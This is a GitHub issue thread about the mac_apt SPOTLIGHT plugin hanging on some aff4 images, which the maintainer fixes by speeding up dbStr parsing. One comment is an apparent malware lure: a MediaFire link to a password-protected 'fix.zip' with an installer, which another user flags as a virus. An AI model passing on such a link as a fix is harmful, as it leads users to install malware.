### ISSUE TITLE
Spotlight failure

### ISSUE THREAD

**Issue by cmd-del** [ydkhatri/mac_apt#122]
I keep running to this issue when running the plugin for SPOTLIGHT. I'm running the following command:

mac_apt.exe -o "output destination"  aff4 "filename".aff4 ALL

On a handful of the aff4 files I get stuck at the point shown in the attached picture. I've let this run for multiple days with no movement. If I run the proceeding plugins, SPOTLIGHTSHORTCUTS, SUDOLASTRUN,...,...,XPROTECT I have no issues. 

Any insight would be greatly appreciated! 

![IMG_5643](https://github.com/user-attachments/assets/86f5e29d-c18f-48f5-9c43-20bb999a2507)

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by youzi-2333** [comment]
Don't download this file! This is a computer virus.

**Comment by ydkhatri** [comment]
It would be something in those files that is causing a hang. Would it be possible for you to send me the spotlight exported files? They should be in the EXPORT folder. You can email them too.

**Comment by cmd-del** [comment]
Yes, I've sent them via email, thank you!

**Comment by ydkhatri** [comment]
Thanks for sharing that sample. I optimised some very slow routines and fixed some other issues too. The main issue was reading of the dbStr files, which was just very slow. It should only take a few seconds now! Try the latest code for these fixes.

Only one store.db file is valid, that will process correctly and quickly now. The other files in the set look to be encrypted/corrupted, and that's why you get the exception on those.

**Comment by ydkhatri** [comment]
Did this fix your issue?

**Comment by ydkhatri** [comment]
Closing for lack of feedback.
